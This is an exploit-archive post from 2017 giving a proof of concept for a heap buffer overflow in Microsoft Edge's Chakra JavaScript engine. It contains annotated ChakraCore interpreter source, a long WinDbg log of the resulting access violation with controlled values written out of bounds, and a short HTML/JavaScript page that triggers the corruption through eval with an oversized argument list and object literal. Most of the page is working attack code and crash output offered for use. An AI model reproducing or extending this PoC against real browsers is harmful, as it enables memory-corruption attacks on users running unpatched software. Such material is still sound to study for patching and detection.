Home / os / winmobile

Microsoft Edge Chakra Heap Buffer Overflow

Posted on 22 August 2017

<!--
Report by Huang Anwen, He Xiaoxiao of ichunqiu Ker Team

This is the HEAP BASED OVERFLOW version of the issue.

// ChakraCore-masterlibRuntimeLanguageInterpreterStackFrame.cpp
Var InterpreterStackFrame::InterpreterHelper(ScriptFunction* function, ArgumentReader args, void* returnAddress, void* addressOfReturnAddress, const bool isAsmJs)
{

[...]

if (!isAsmJs && executeFunction->IsCoroutine())
{
[...]
}
else
{
InterpreterStackFrame::Setup setup(function, args);
size_t varAllocCount = setup.GetAllocationVarCount();
//printf("varAllocCount: %d(%X)
", varAllocCount, varAllocCount);
size_t varSizeInBytes = varAllocCount * sizeof(Var);

//
// Allocate a new InterpreterStackFrame instance on the interpreter's virtual stack.
//
DWORD_PTR stackAddr;

// If the locals area exceeds a certain limit, allocate it from a private arena rather than
// this frame. The current limit is based on an old assert on the number of locals we would allow here.
if (varAllocCount > InterpreterStackFrame::LocalsThreshold) //we can make this condition satisfied so the buffer will be allocated on the heap instead of the stack!!!
{
ArenaAllocator *tmpAlloc = nullptr;
fReleaseAlloc = functionScriptContext->EnsureInterpreterArena(&tmpAlloc);
allocation = (Var*)tmpAlloc->Alloc(varSizeInBytes);
stackAddr = reinterpret_cast<DWORD_PTR>(&allocation); // use a stack address so the debugger stepping logic works (step-out, for example, compares stack depths to determine when to complete the step)
}
else
{
PROBE_STACK_PARTIAL_INITIALIZED_INTERPRETER_FRAME(functionScriptContext, Js::Constants::MinStackInterpreter + varSizeInBytes);
allocation = (Var*)_alloca(varSizeInBytes);
#if DBG
memset(allocation, 0xFE, varSizeInBytes);
#endif
stackAddr = reinterpret_cast<DWORD_PTR>(allocation);
}

[...]
return aReturn;
}

Microsoft (R) Windows Debugger Version 6.12.0002.633 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.

*** wait with pending attach
Symbol search path is: SRV*c:mysymbol* http://msdl.microsoft.com/download/symbols
Executable search path is:
ModLoad: 00007ff7`49700000 00007ff7`49725000 C:WindowsSystemAppsMicrosoft.MicrosoftEdge_8wekyb3d8bbweMicrosoftEdgeCP.exe
ModLoad: 00007ffa`13700000 00007ffa`138db000 C:WindowsSYSTEM32
tdll.dll
ModLoad: 00007ffa`119f0000 00007ffa`11a9e000 C:WindowsSystem32KERNEL32.DLL
ModLoad: 00007ffa`0fd90000 00007ffa`0ffd9000 C:WindowsSystem32KERNELBASE.dll
ModLoad: 00007ffa`0e140000 00007ffa`0e1be000 C:WindowsSYSTEM32apphelp.dll
ModLoad: 00007ffa`11b80000 00007ffa`11e79000 C:WindowsSystem32combase.dll
ModLoad: 00007ffa`103f0000 00007ffa`104e6000 C:WindowsSystem32ucrtbase.dll
ModLoad: 00007ffa`11160000 00007ffa`11285000 C:WindowsSystem32RPCRT4.dll
ModLoad: 00007ffa`104f0000 00007ffa`1055a000 C:WindowsSystem32cryptPrimitives.dll
ModLoad: 00007ffa`11630000 00007ffa`116cd000 C:WindowsSystem32msvcrt.dll
ModLoad: 00007ffa`0a400000 00007ffa`0a460000 C:WindowsSYSTEM32wincorlib.DLL
ModLoad: 00007ffa`10c90000 00007ffa`10d50000 C:WindowsSystem32OLEAUT32.dll
ModLoad: 00007ffa`0fcd0000 00007ffa`0fd6a000 C:WindowsSystem32msvcp_win.dll
ModLoad: 00007ffa`0fc00000 00007ffa`0fc11000 C:WindowsSystem32kernel.appcore.dll
ModLoad: 00007ff9`f3680000 00007ff9`f3a44000 C:WindowsSystemAppsMicrosoft.MicrosoftEdge_8wekyb3d8bbweEdgeContent.dll
ModLoad: 00007ffa`10560000 00007ffa`10c52000 C:WindowsSystem32Windows.Storage.dll
ModLoad: 00007ffa`11940000 00007ffa`119e1000 C:WindowsSystem32advapi32.dll
ModLoad: 00007ffa`11b20000 00007ffa`11b79000 C:WindowsSystem32sechost.dll
ModLoad: 00007ffa`113e0000 00007ffa`11431000 C:WindowsSystem32shlwapi.dll
ModLoad: 00007ffa`10c60000 00007ffa`10c87000 C:WindowsSystem32GDI32.dll
ModLoad: 00007ffa`10200000 00007ffa`10388000 C:WindowsSystem32gdi32full.dll
ModLoad: 00007ffa`10d60000 00007ffa`10eaa000 C:WindowsSystem32USER32.dll
ModLoad: 00007ffa`0fd70000 00007ffa`0fd8e000 C:WindowsSystem32win32u.dll
ModLoad: 00007ffa`11790000 00007ffa`1183a000 C:WindowsSystem32shcore.dll
ModLoad: 00007ffa`0fb70000 00007ffa`0fbbc000 C:WindowsSystem32powrprof.dll
ModLoad: 00007ffa`0fbc0000 00007ffa`0fbd5000 C:WindowsSystem32profapi.dll
ModLoad: 00007ffa`08380000 00007ffa`08606000 C:WindowsSYSTEM32iertutil.dll
ModLoad: 00007ffa`0ee70000 00007ffa`0eea1000 C:WindowsSYSTEM32
tmarta.dll
ModLoad: 00007ffa`0fa70000 00007ffa`0fa99000 C:WindowsSYSTEM32USERENV.dll
ModLoad: 00007ff9`ff7d0000 00007ff9`ff7f6000 C:WindowsSYSTEM32clipc.dll
ModLoad: 00007ffa`0f200000 00007ffa`0f2a4000 C:WindowsSYSTEM32DNSAPI.dll
ModLoad: 00007ffa`0f5c0000 00007ffa`0f5d7000 C:WindowsSYSTEM32cryptsp.dll
ModLoad: 00007ffa`115b0000 00007ffa`1161c000 C:WindowsSystem32WS2_32.dll
ModLoad: 00007ffa`10d50000 00007ffa`10d58000 C:WindowsSystem32NSI.dll
ModLoad: 00007ffa`11730000 00007ffa`1175d000 C:WindowsSystem32IMM32.DLL
ModLoad: 00007ffa`0f1c0000 00007ffa`0f1f7000 C:WindowsSYSTEM32IPHLPAPI.DLL
ModLoad: 00007ffa`0e540000 00007ffa`0e6b0000 C:WindowsSYSTEM32	winapi.appcore.dll
ModLoad: 00007ffa`0fa40000 00007ffa`0fa65000 C:WindowsSYSTEM32crypt.dll
ModLoad: 00007ffa`0eca0000 00007ffa`0ecc1000 C:WindowsSYSTEM32profext.dll
ModLoad: 00007ff9`ff580000 00007ff9`ff5f4000 C:WindowsSYSTEM32msiso.dll
ModLoad: 00007ffa`054d0000 00007ffa`054f2000 C:WindowsSYSTEM32EShims.dll
ModLoad: 00007ffa`045d0000 00007ffa`045eb000 C:WindowsSYSTEM32MPR.dll
ModLoad: 00007ffa`11290000 00007ffa`113d5000 C:WindowsSystem32ole32.dll
ModLoad: 00007ffa`0e370000 00007ffa`0e405000 C:Windowssystem32uxtheme.dll
ModLoad: 00007ff9`f1650000 00007ff9`f2d01000 C:WindowsSYSTEM32edgehtml.dll
ModLoad: 00007ffa`0c190000 00007ffa`0c2c9000 C:WindowsSYSTEM32wintypes.dll
ModLoad: 00007ff9`f0e60000 00007ff9`f164b000 C:WindowsSYSTEM32chakra.dll
ModLoad: 00007ffa`04630000 00007ffa`0466f000 C:WindowsSYSTEM32MLANG.dll
ModLoad: 00007ffa`0c840000 00007ffa`0c8b6000 C:WindowsSYSTEM32policymanager.dll
ModLoad: 00007ffa`0c6f0000 00007ffa`0c77f000 C:WindowsSYSTEM32msvcp110_win.dll
ModLoad: 00007ffa`0cb10000 00007ffa`0cca6000 C:WindowsSYSTEM32PROPSYS.dll
ModLoad: 00007ffa`04d30000 00007ffa`04dfb000 C:WindowsSystem32ieproxy.dll
ModLoad: 00007ffa`09f90000 00007ffa`0a096000 C:WindowsSystem32Windows.UI.dll
ModLoad: 00007ffa`0a230000 00007ffa`0a2b2000 C:WindowsSYSTEM32TextInputFramework.dll
ModLoad: 00007ffa`0b640000 00007ffa`0b912000 C:WindowsSYSTEM32CoreUIComponents.dll
ModLoad: 00007ffa`0da10000 00007ffa`0daf3000 C:WindowsSYSTEM32CoreMessaging.dll
ModLoad: 00007ffa`0c6d0000 00007ffa`0c6e5000 C:WindowsSYSTEM32usermgrcli.dll
ModLoad: 00007ffa`0abe0000 00007ffa`0b111000 C:WindowsSystem32OneCoreUAPCommonProxyStub.dll
ModLoad: 00007ffa`11e80000 00007ffa`132b7000 C:WindowsSystem32shell32.dll
ModLoad: 00007ffa`101b0000 00007ffa`101f9000 C:WindowsSystem32cfgmgr32.dll
ModLoad: 00007ffa`0ccb0000 00007ffa`0ccda000 C:WindowsSYSTEM32dwmapi.dll
ModLoad: 00007ff9`ff8e0000 00007ff9`ffc0e000 C:WindowsSYSTEM32WININET.dll
ModLoad: 00007ffa`0faa0000 00007ffa`0fad0000 C:WindowsSYSTEM32SspiCli.dll
ModLoad: 00007ffa`11440000 00007ffa`115a6000 C:WindowsSystem32msctf.dll
ModLoad: 00007ffa`0a0a0000 00007ffa`0a1a2000 C:WindowsSYSTEM32mrmcorer.dll
ModLoad: 00007ff9`fddf0000 00007ff9`fde00000 C:WindowsSYSTEM32	okenbinding.dll
ModLoad: 00007ffa`00260000 00007ffa`0027b000 C:WindowsSYSTEM32ondemandconnroutehelper.dll
ModLoad: 00007ffa`0a370000 00007ffa`0a3d9000 C:WindowsSYSTEM32Bcp47Langs.dll
ModLoad: 00007ffa`07430000 00007ffa`07507000 C:WindowsSYSTEM32winhttp.dll
ModLoad: 00007ffa`0f420000 00007ffa`0f47c000 C:Windowssystem32mswsock.dll
ModLoad: 00007ffa`0a730000 00007ffa`0a73b000 C:WindowsSYSTEM32WINNSI.DLL
ModLoad: 00007ffa`07260000 00007ffa`07428000 C:WindowsSYSTEM32urlmon.dll
ModLoad: 00007ffa`0f5e0000 00007ffa`0f5eb000 C:WindowsSYSTEM32CRYPTBASE.DLL
ModLoad: 00007ff9`fe760000 00007ff9`fe77a000 C:WindowsSystem32Windows.Shell.ServiceHostBuilder.dll
ModLoad: 00007ff9`f3a50000 00007ff9`f3bda000 C:WindowsSYSTEM32ieapfltr.dll
ModLoad: 00007ffa`0e1d0000 00007ffa`0e1ed000 C:WindowsSystem32
mclient.dll
ModLoad: 00007ff9`fd750000 00007ff9`fd768000 C:WindowsSystem32UiaManager.dll
ModLoad: 00007ff9`fb720000 00007ff9`fb767000 C:Windowssystem32dataexchange.dll
ModLoad: 00007ffa`0d180000 00007ffa`0d45f000 C:WindowsSYSTEM32d3d11.dll
ModLoad: 00007ffa`0db30000 00007ffa`0dc52000 C:WindowsSYSTEM32dcomp.dll
ModLoad: 00007ffa`0e9e0000 00007ffa`0ea84000 C:WindowsSYSTEM32dxgi.dll
ModLoad: 00007ff9`fc470000 00007ff9`fc4f2000 C:Windowssystem32	winapi.dll
ModLoad: 00007ffa`060c0000 00007ffa`060e8000 C:WindowsSYSTEM32srpapi.dll
ModLoad: 00007ffa`0ffe0000 00007ffa`101a9000 C:WindowsSystem32CRYPT32.dll
ModLoad: 00007ffa`0fbe0000 00007ffa`0fbf1000 C:WindowsSystem32MSASN1.dll
ModLoad: 00007ff9`f8480000 00007ff9`f84fa000 C:WindowsSYSTEM32windows.ui.core.textinput.dll
ModLoad: 00007ff9`ff120000 00007ff9`ff17d000 C:WindowsSYSTEM32
input.dll
ModLoad: 00007ffa`0d460000 00007ffa`0da04000 C:WindowsSYSTEM32d2d1.dll
ModLoad: 00007ffa`06cf0000 00007ffa`06faf000 C:WindowsSYSTEM32DWrite.dll
ModLoad: 00007ff9`f8060000 00007ff9`f80ba000 C:WindowsSystem32Windows.Graphics.dll
ModLoad: 00007ffa`06950000 00007ffa`0695f000 C:WindowsSystem32Windows.Internal.SecurityMitigationsBroker.dll
ModLoad: 00007ffa`0b1c0000 00007ffa`0b202000 C:WindowsSYSTEM32vm3dum64.dll
ModLoad: 00007ffa`0b150000 00007ffa`0b1b7000 C:WindowsSYSTEM32D3D10Level9.dll
ModLoad: 00007ff9`fbc20000 00007ff9`fbc8b000 C:WindowsSystem32oleacc.dll
ModLoad: 00007ffa`06480000 00007ffa`06490000 C:Windowssystem32msimtf.dll
ModLoad: 00007ffa`06ab0000 00007ffa`06b38000 C:Windowssystem32directmanipulation.dll
ModLoad: 00007ff9`fe370000 00007ff9`fe411000 C:Program FilesCommon Filesmicrosoft sharedink	iptsf.dll
ModLoad: 00007ffa`06760000 00007ffa`06774000 C:WindowsSystem32Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll
ModLoad: 00007ffa`05a10000 00007ffa`05a48000 C:WindowsSystem32smartscreenps.dll
ModLoad: 00007ffa`06b40000 00007ffa`06cc8000 C:WindowsSYSTEM32windows.globalization.dll
(11fc.108c): Access violation - code c0000005 (!!! second chance !!!)
chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d:
00007ff9`f124bcad 488904d1 mov qword ptr [rcx+rdx*8],rax ds:0000015e`3d550000=????????????????
0:016> r
rax=0001000042424242 rbx=000000388f1fb8b0 rcx=0000015e3d5401b0
rdx=0000000000001fca rsi=0000000000000002 rdi=000000388f1fb3c0
rip=00007ff9f124bcad rsp=000000388f1fbae0 rbp=000000388f1fbb10
r8=0000015e3d500030 r9=0000015e2c538000 r10=000000388f1fb918
r11=0000015e2c53c000 r12=0000000000000000 r13=0000015e2932a120
r14=0000000000000000 r15=0000015e4063f9b3
iopl=0 nv up ei pl nz ac pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010210
chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d:
00007ff9`f124bcad 488904d1 mov qword ptr [rcx+rdx*8],rax ds:0000015e`3d550000=????????????????
0:016> dq ecx
0000015e`3d5401b0 00000000`00000000 00010000`42424242
0000015e`3d5401c0 00010000`42424242 00010000`42424242
0000015e`3d5401d0 00010000`42424242 00010000`42424242
0000015e`3d5401e0 00010000`42424242 00010000`42424242
0000015e`3d5401f0 00010000`42424242 00010000`42424242
0000015e`3d540200 00010000`42424242 00010000`42424242
0000015e`3d540210 00010000`42424242 00010000`42424242
0000015e`3d540220 00010000`42424242 00010000`42424242

0:016> dq [ecx+edx*8]
0000015e`3d550000 ????????`???????? ????????`????????
0000015e`3d550010 ????????`???????? ????????`????????
0000015e`3d550020 ????????`???????? ????????`????????
0000015e`3d550030 ????????`???????? ????????`????????
0000015e`3d550040 ????????`???????? ????????`????????
0000015e`3d550050 ????????`???????? ????????`????????
0000015e`3d550060 ????????`???????? ????????`????????
0000015e`3d550070 ????????`???????? ????????`????????
0:016> !address ecx

Failed to map Heaps (error 8007001e)
Usage: <unclassified>
Allocation Base: 0000015e`3d500000
Base Address: 0000015e`3d500000
End Address: 0000015e`3d550000
Region Size: 00000000`00050000
Type: 00020000 MEM_PRIVATE
State: 00001000 MEM_COMMIT
Protect: 00000004 PAGE_READWRITE

0:016> !address 0000015e`3d550000
Usage: Free
Base Address: 0000015e`3d550000
End Address: 0000015e`3d7f0000
Region Size: 00000000`002a0000
Type: 00000000
State: 00010000 MEM_FREE
Protect: 00000001 PAGE_NOACCESS

0:016> kb
RetAddr : Args to Child : Call Site
00007ff9`f10fe96d : 0000015e`3d500030 0000015e`4063f9ac 00000038`8f1fbb70 0000015e`4063f9ac : chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d
00007ff9`f0f5ffb1 : 0000015e`3d500030 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x19e8fd
00007ff9`f0ff80cc : 0000015e`3d500030 0000015e`3c7a01a0 00000038`8f1fbc30 00007ff9`f0ebc500 : chakra!Js::InterpreterStackFrame::Process+0x1b1
00007ff9`f0ff7be1 : 0000015e`2c560600 00000038`8f1fbe10 0000015e`3c7e0fba 00000038`8f1fbe28 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac
0000015e`3c7e0fba : 00000038`8f1fbe60 0000015e`2c560600 ffffffff`fffffffe 00007ff9`f10d6750 : chakra!Js::InterpreterStackFrame::InterpreterThunk+0x51
00007ff9`f0e783df : 0000015e`2c560600 00000000`04000001 0000015e`2c550020 00000038`8f1fbef0 : 0x15e`3c7e0fba
00007ff9`f0e7816a : 0000015e`3c7a01a0 0000015e`2c560600 00007ff9`f15a9f80 00000038`8f1fbef0 : chakra!Js::GlobalObject::ExecuteEvalParsedFunction+0x77
00007ff9`f0e77fb8 : 0000015e`2c540000 00007ff9`f15a9f80 0000015e`00000000 0000015e`2c53c000 : chakra!Js::GlobalObject::VEval+0x19a
00007ff9`f0e77ecd : 00000038`8f1fc040 0000015e`2c53b5c0 0000015e`2932a120 00000038`8f1fc000 : chakra!Js::GlobalObject::EntryEvalHelper+0xc8
00007ff9`f10d6be3 : 0000015e`2c53b5c0 00000000`18000003 0000015e`2c550020 0000015e`2c54d770 : chakra!Js::GlobalObject::EntryEval+0x7d
00007ff9`f0fc6bf3 : 0000015e`2932a120 00000000`00000018 00000038`8f1fc0e8 0000015e`2c53c000 : chakra!amd64_CallFunction+0x93
00007ff9`f0e871ac : 0000015e`2c53b5c0 00007ff9`f0e77e50 00000038`8f1fc110 00000038`8f1fc2a0 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83
00007ff9`f0e877b4 : 00000038`8f1fc2a0 0000015e`3c7c0116 0000015e`2c53b5c0 00007ff9`00000008 : chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > > >+0x114
00007ff9`f0f64920 : 00000038`8f1fc2a0 0000015e`3c7c0116 0000015e`8f1fc2a0 0000015e`3c7c0124 : chakra!Js::InterpreterStackFrame::OP_ProfiledReturnTypeCallIExtendedFlags<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > >+0x5c
00007ff9`f0f5ff2c : 00000038`8f1fc2a0 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessProfiled+0x1250
00007ff9`f0ff80cc : 00000038`8f1fc2a0 0000015e`3c7a0000 00000038`8f1fc4a0 00000000`00000001 : chakra!Js::InterpreterStackFrame::Process+0x12c
00007ff9`f0ff7be1 : 0000015e`2c560480 00000038`8f1fc680 0000015e`3c7e0fc2 00000038`8f1fc698 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac
0000015e`3c7e0fc2 : 00000038`8f1fc6d0 00000000`00000000 00000000`00000000 00007ff9`f10d6750 : chakra!Js::InterpreterStackFrame::InterpreterThunk+0x51
00007ff9`f10d6be3 : 0000015e`2c560480 00000000`00000000 00000000`00000000 00000000`00000000 : 0x15e`3c7e0fc2
00007ff9`f0fc6bf3 : 0000015e`2932a120 00000000`00000000 0000015e`29352a10 00007ff9`f0fda837 : chakra!amd64_CallFunction+0x93
00007ff9`f0ff1810 : 0000015e`2c560480 00007ff9`f10d6df0 00000038`8f1fc7d0 0000015e`2932d110 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83
00007ff9`f0ff0a37 : 0000015e`2c560480 00000038`8f1fc8c0 0000015e`2932d110 00007ffa`11697100 : chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x100
00007ff9`f10b907e : 0000015e`2c560480 00000038`8f1fc920 0000015e`2932d110 0000015e`2932da00 : chakra!Js::JavascriptFunction::CallRootFunction+0x4b
00007ff9`f101cd54 : 0000015e`2c560480 00000038`8f1fc960 00000000`00000000 00000038`8f1fc978 : chakra!ScriptSite::CallRootFunction+0x6a
00007ff9`f0fb1b49 : 0000015e`2932d000 0000015e`2c560480 00000038`8f1fca10 00000000`00000000 : chakra!ScriptSite::Execute+0x124
00007ff9`f0fb2e8e : 0000015e`29329cd0 00000038`8f1fcf18 00000038`8f1fcf50 00000038`80000082 : chakra!ScriptEngine::ExecutePendingScripts+0x1a5
00007ff9`f0fb3121 : 0000015e`29329cd0 0000015e`29ce82e4 00000000`00000000 00000156`270b4330 : chakra!ScriptEngine::ParseScriptTextCore+0x436
00007ff9`f1a53c75 : 0000015e`29329d20 0000015e`29ce82e4 00000156`000000f1 00000000`00000000 : chakra!ScriptEngine::ParseScriptText+0xb1
00007ff9`f1a53abe : 00000000`00000000 00000038`8f1fcde9 00000156`270b4260 00000156`00000000 : edgehtml!CJScript9Holder::ParseScriptText+0x119
00007ff9`f1a535d7 : 00000000`00000000 00000156`270b4260 00000156`2703c1c0 00000156`270b41b0 : edgehtml!CScriptCollection::ParseScriptText+0x202
00007ff9`f1a52f07 : 00000156`27050c01 00000156`270ac100 00000156`00000082 00007ff9`00000000 : edgehtml!CScriptData::CommitCode+0x357
00007ff9`f1b12f8d : 00000000`ffffffff 00000156`2703c460 00000000`ffffffff 00000000`00000000 : edgehtml!CScriptData::Execute+0x20f
00007ff9`f19543d4 : 00000000`00000000 00000156`2708c440 00000000`00000001 00007ff9`f1b0ceb9 : edgehtml!CHtmScriptParseCtx::Execute+0x7d
00007ff9`f19534a1 : 00000156`27050c00 00000000`00000000 00000156`27050c00 00000156`2702c8c0 : edgehtml!CHtmParseBase::Execute+0x204
00007ff9`f1b0d23b : 00000000`00026e8b 00000156`27020000 00000156`270800b0 00000156`2702c8c0 : edgehtml!CHtmPost::Exec+0x1e1
00007ff9`f1b0d11f : 00000156`2702c8c0 00000000`00026e8b 0000015e`29ce82e0 00000000`00000000 : edgehtml!CHtmPost::Run+0x2f
00007ff9`f1b0cfd3 : 00000156`27020000 00000000`09806f01 00000000`00000002 00000156`27061680 : edgehtml!PostManExecute+0x63
00007ff9`f1b0ce6d : 00000156`2702c8c0 00000000`09806ff9 0000015e`00000000 00007ffa`083a4779 : edgehtml!PostManResume+0xa3
00007ff9`f1b1b353 : 00000156`27048600 0000015e`29c26b50 00000000`00000000 00000000`00000000 : edgehtml!CHtmPost::OnDwnChanCallback+0x3d
00007ff9`f1af50db : 00000156`270282d0 0000015e`29325463 0000015e`29302200 00000038`8f1fd4a0 : edgehtml!CDwnChan::OnMethodCall+0x23
00007ff9`f1981706 : 0000015e`29302728 00000156`27061680 0000015e`29302260 00000038`8f1fd4d0 : edgehtml!GWndAsyncTask::Run+0x1b
00007ff9`f1aca860 : 00000000`16389c44 00000156`270616e0 00000156`270800b0 00007ff9`f1a29138 : edgehtml!HTML5TaskScheduler::RunReadiedTask+0x236
00007ff9`f1aca683 : 0000015e`29c26b50 00000000`00000000 00000000`00000002 00000156`27028170 : edgehtml!TaskSchedulerBase::RunReadiedTasksInTaskQueueWithCallback+0x70
00007ff9`f19822b3 : 00000038`8f1fd980 00000000`00008002 00000156`27028170 00007ffa`10d847df : edgehtml!HTML5TaskScheduler::RunReadiedTasks+0xa3
00007ff9`f19807a5 : 00000000`00008002 00000156`27020000 00000156`00000000 00000000`00000002 : edgehtml!NormalPriorityAtInputEventLoopDriver::DriveRegularPriorityTaskExecution+0x53
00007ffa`10d6bc50 : 00000000`00e80380 00000000`00000001 00000000`00000002 00000000`80000012 : edgehtml!GlobalWndProc+0x125
00007ffa`10d6b5cf : 00000156`276d4470 00007ff9`f1980680 00000000`00e80380 00000000`00e80380 : USER32!UserCallWinProcCheckWow+0x280
00007ff9`f3686d0e : 00000038`8f1fd920 00000000`00000000 00000156`26f58170 00000000`00000000 : USER32!DispatchMessageWorker+0x19f
00007ff9`f369eecb : 00000000`00000000 00000000`00000001 00000156`27229e70 00000156`26fd40f0 : EdgeContent!CBrowserTab::_TabWindowThreadProc+0x3ee
00007ff9`ff58b4a8 : 00000000`00000000 00000156`27228f80 00000000`00000000 00000000`00000000 : EdgeContent!LCIETab_ThreadProc+0x2ab
00007ffa`11a02774 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : msiso!_IsoThreadProc_WrapperToReleaseScope+0x48
00007ffa`13770d61 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21

-->
<html>
<head>
<title> POC </title>
</head>
<script>

var a=[];
a.length=0xffff-1;
a.fill('0x42424242');

var s='{';
for(var i=0; i<0x8000-1; i++){
s+= 'a'+i+':0,'
};
s+= 'b:0';
s+= '}';

var c='function Car(){}; var car=new Car(' + a.join() + ',' + s + ')';
eval(c);

</script>
</html>

 

TOP